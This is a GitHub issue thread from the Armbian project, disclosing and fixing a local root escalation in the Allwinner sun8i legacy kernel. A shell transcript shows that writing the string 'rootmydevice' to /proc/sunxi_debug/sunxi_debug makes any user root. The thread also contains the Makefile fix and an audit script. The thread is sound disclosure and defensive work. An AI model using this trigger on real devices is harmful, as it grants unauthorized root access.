Allwinner legacy kernel: local privileges escalation to root (sun8i) #282

Closed
ThomasKaiser opened this Issue Apr 30, 2016 · 13 comments


@ThomasKaiser
Collaborator

Please have a look at http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390;

The file is still present in the newer sun8i BSP variant and I would assume sun7i and others are also affected?

Don't know how to deal with it.

@ThomasKaiser
Collaborator

Hmm... sun7i doesn't have it but sun8i is affected:

tk@bananapim3:~$ id
uid=1000(tk) gid=1000(tk) groups=1000(tk),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev)
tk@bananapim3:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug 
tk@bananapim3:~$ id
uid=0(root) gid=0(root) groups=0(root),20(dialout),27(sudo),29(audio),44(video),46(plugdev),108(netdev),1000(tk)
@zador-blood-stained
Collaborator

I saw this on IRC yesterday. Even though this is more a local privilege escalation than a backdoor, IMO it should be disabled.

@ThomasKaiser
Collaborator

I agree that it should be disabled. Based on my understanding this privilege escalation combined with any other small bug might lead to a network-enabled exploit (I would assume a php, nginx or apache process redirected to /proc/sunxi_debug/sunxi_debug could also become root this way?)

@zador-blood-stained
Collaborator

I would assume a php, nginx or apache process redirected to /proc/sunxi_debug/sunxi_debug could also become root this way?

Yes, most likely.

Removing sunxi_debug.o from this line (and deleting file sunxi_debug.c) may be the simplest solution if it doesn't break compilation.
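An audit script for both points above (the unprivileged write to /proc/sunxi_debug/sunxi_debug shown earlier in the thread, and the Makefile fix proposed here), added as an example and not code from Armbian, the sunxi kernel tree or any commenter. It only inspects the proc node and never writes the trigger string, so it is safe to run on a board as an ordinary user before and after the fix. The function names are this example's own, and because the thread does not give the path of the Makefile line that links sunxi_debug.o, that path is passed in as an argument.

```shell
#!/bin/sh
# Added example for this issue thread (not Armbian or sunxi kernel code).
# It checks whether the sunxi_debug proc node is reachable from the calling
# uid and whether a kernel Makefile still links sunxi_debug.o. It never writes
# "rootmydevice" to the node. Helper names are assumptions of this example.

SUNXI_DEBUG_NODE="/proc/sunxi_debug/sunxi_debug"

# check_sunxi_debug [NODE]
# Exit status: 0 = node exists and is writable by this uid (escalation path open)
#              2 = node exists but this uid cannot write to it
#              1 = node absent (kernel built without sunxi_debug.o, or a SoC
#                  family such as sun7i that never had it)
# [ -w ] uses access(2), so run this as the unprivileged user you care about;
# as root it is always true and tells you nothing.
check_sunxi_debug() {
    node="${1:-$SUNXI_DEBUG_NODE}"
    if [ ! -e "$node" ]; then
        echo "absent: $node"
        return 1
    fi
    if [ -w "$node" ]; then
        echo "EXPOSED: $node is writable by uid $(id -u); writing the trigger string would make this process root"
        return 0
    fi
    echo "present, not writable by uid $(id -u): $node"
    return 2
}

# makefile_references_sunxi_debug MAKEFILE
# Exit status 0 if the given kernel Makefile still links sunxi_debug.o.
makefile_references_sunxi_debug() {
    grep -q 'sunxi_debug\.o' "$1"
}

# strip_sunxi_debug_from_makefile MAKEFILE
# Removes only the sunxi_debug.o token so other objects on the same line stay
# linked (the hand edit described in the thread); sunxi_debug.c itself is
# deleted separately.
strip_sunxi_debug_from_makefile() {
    sed 's/[[:space:]]*sunxi_debug\.o//g' "$1" > "$1.tmp" && mv "$1.tmp" "$1"
}

# Stand-alone use on a board when saved as sunxi_debug_check.sh: audit the
# running kernel, then optionally check a kernel Makefile given as $1.
# The name guard lets the functions also be sourced from another script.
if [ "${0##*/}" = "sunxi_debug_check.sh" ]; then
    check_sunxi_debug
    rc=$?
    if [ $# -ge 1 ]; then
        if makefile_references_sunxi_debug "$1"; then
            echo "$1 still references sunxi_debug.o"
        else
            echo "$1 does not reference sunxi_debug.o"
        fi
    fi
    exit $rc
fi
```

Run it as the normal login user (uid 1000 in the thread's transcript), not via sudo, since the writability test is about that uid; a status of 0 on a board means the one-line escalation in the thread works there, and 1 after rebuilding confirms the node is gone.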

@ThomasKaiser
Collaborator

Can you try it out? At least whether the build fails or not? My main build host is still busy doing other stuff and the 2nd host is also down (for yet unknown reasons -- too far away to look after it)

@ThomasKaiser ThomasKaiser referenced this issue in jernejsk/OpenELEC-OPi2 on Apr 30, 2016: "Local privileges escalation on sun8i #42" (Closed)

@zador-blood-stained
Collaborator

Build succeeds, so this should work

@ThomasKaiser
Collaborator

Could you also provide debs to be able to test? :-)

@ThomasKaiser ThomasKaiser changed the title from Allwinner legacy backdoor? to Allwinner legacy kernel: local privileges escalation to root (sun8i) Apr 30, 2016
@ThomasKaiser
Collaborator

Fix confirmed to work by 'original submitter' KotCzarny himself :) http://irclog.whitequark.org/linux-sunxi/2016-04-30#16321288

So please push the fix. And I hope Igor checks the download log, and in case no one downloaded BPi M2+ 5.10 images we could simply re-release the M2+ image with the fix included (otherwise we would have to increase the version number already to 5.11 if I understand correctly?)

@zador-blood-stained
Collaborator

It's in my repository already, so it's a matter of merging my branch into this.

@kotc
kotc commented Apr 30, 2016

@ThomasKaiser : happy to help, thanks for quick response!

@ThomasKaiser
Collaborator

@kotc: Thx for bringing this to our attention. Since we're rolling out a new major release this weekend this was almost perfectly timed. I also thought about fixing the issue for all of the many loboris images out there (already cloned his kernel repo since he didn't maintain it for maybe half a year) but thought again about it. Users better switch to Armbian instead :)

@igorpecovnik
Owner

Bugs and problems usually arise when I do travel :) No downloads, so we can stay on 5.10, but I guess we will have an update to 5.11 in any case very soon since it's almost impossible to bring such an update without any more or less serious problem.

Merged, so closing.
